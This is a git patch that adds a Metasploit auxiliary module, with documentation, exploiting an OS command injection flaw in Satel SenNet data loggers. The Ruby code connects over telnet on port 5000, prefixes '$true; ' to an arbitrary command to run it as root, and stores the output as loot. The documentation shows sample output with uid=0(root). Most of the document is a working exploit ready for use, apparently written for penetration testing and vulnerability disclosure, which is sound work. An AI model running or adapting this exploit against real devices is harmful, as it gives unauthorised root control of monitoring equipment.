From e65eacce49523f8fdee1a42d1b367f9d7b1c4882 Mon Sep 17 00:00:00 2001 From: juushya Date: Fri, 7 Apr 2017 02:22:11 +0530 Subject: [PATCH] Add Satel SenNet Command Exec Module --- .../scanner/telnet/satel_cmd_exec.md | 23 +++++ .../scanner/telnet/satel_cmd_exec.rb | 86 +++++++++++++++++++ 2 files changed, 109 insertions(+) create mode 100644 documentation/modules/auxiliary/scanner/telnet/satel_cmd_exec.md create mode 100644 modules/auxiliary/scanner/telnet/satel_cmd_exec.rb diff --git a/documentation/modules/auxiliary/scanner/telnet/satel_cmd_exec.md b/documentation/modules/auxiliary/scanner/telnet/satel_cmd_exec.md new file mode 100644 index 0000000000..0ab3e89e80 --- /dev/null +++ b/documentation/modules/auxiliary/scanner/telnet/satel_cmd_exec.md @@ -0,0 +1,23 @@ +This module exploits an OS Command Injection vulnerability in Satel SenNet Data Loggers to perform arbitrary command execution as 'root'. + +## Verification Steps + +1. Do: ```use auxiliary/scanner/telnet/satel_cmd_exec``` +2. Do: ```set RHOSTS [IP]``` +3. Do: ```set RPORT [PORT]``` +4. Do: ```run``` + +## Sample Output + + ``` +msf > use auxiliary/scanner/telnet/satel_cmd_exec +msf auxiliary(satel_cmd_exec) > set rhosts 1.3.3.7 +msf auxiliary(satel_cmd_exec) > run + +[*] 1.3.3.7:5000 - Sending command now - id; +[+] 1.3.3.7:5000 - uid=0(root) gid=0(root) +[+] 1.3.3.7:5000 - File saved in: /root/.msf4/loot/20000000000004_1.3.3.7_cmdexeclog_528409.txt +[*] Scanned 1 of 1 hosts (100% complete) +[*] Auxiliary module execution completed + + ``` diff --git a/modules/auxiliary/scanner/telnet/satel_cmd_exec.rb b/modules/auxiliary/scanner/telnet/satel_cmd_exec.rb new file mode 100644 index 0000000000..a8be39ab8c --- /dev/null +++ b/modules/auxiliary/scanner/telnet/satel_cmd_exec.rb @@ -0,0 +1,86 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class MetasploitModule < Msf::Auxiliary + include Msf::Exploit::Remote::Telnet + include Msf::Auxiliary::Report + include Msf::Auxiliary::Scanner + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Satel SenNet Data Logger Privileged Shell Arbitrary Command Execution Vulnerability', + 'Description' => %q{ + This module exploits an OS Command Injection vulnerability in Satel SenNet Data Loggers to perform arbitrary command execution as 'root'. + }, + 'Author' => + [ + 'Karn Ganeshen ' + ], + 'DisclosureDate' => 'Apr 07, 2017', + 'License' => MSF_LICENSE, + 'DefaultOptions' => { 'VERBOSE' => true }) + ) + + register_options( + [ + Opt::RPORT(5000), + OptInt.new('TIMEOUT', [true, 'Timeout for the Telnet probe', 30]), + OptString.new('CMD', [true, 'Command(s) to run', 'id; pwd;']) + ], self.class + ) + + deregister_options('USERNAME', 'PASSWORD') + end + + def report_cred(opts) + service_data = { + address: opts[:ip], + port: opts[:port], + service_name: opts[:service_name], + protocol: 'tcp', + workspace_id: myworkspace_id + } + + login_data = { + last_attempted_at: Time.now, + core: create_credential(credential_data), + status: Metasploit::Model::Login::Status::SUCCESSFUL, + proof: opts[:proof] + }.merge(service_data) + + create_credential_login(login_data) + end + + def run_host(ip) + to = (datastore['TIMEOUT'].zero?) ? 30 : datastore['TIMEOUT'] + begin + ::Timeout.timeout(to) do + command = datastore['CMD'] + inject = '$true; ' + "#{command}" + res = connect + + print_status("Sending command now - #{command}") + + sock.puts(inject) + data = sock.get_once(-1, 5) + + print_good("#{data}") + + loot_name = 'cmd-exec-log' + loot_type = 'text/plain' + loot_desc = 'Satel SenNet CMD Exec Dump' + p = store_loot(loot_name, loot_type, datastore['RHOST'], data, loot_desc) + print_good("File saved in: #{p}") + end + rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError + print_error("#{rhost}:#{rport} - HTTP Connection Failed...") + return false + ensure + disconnect + end + end +end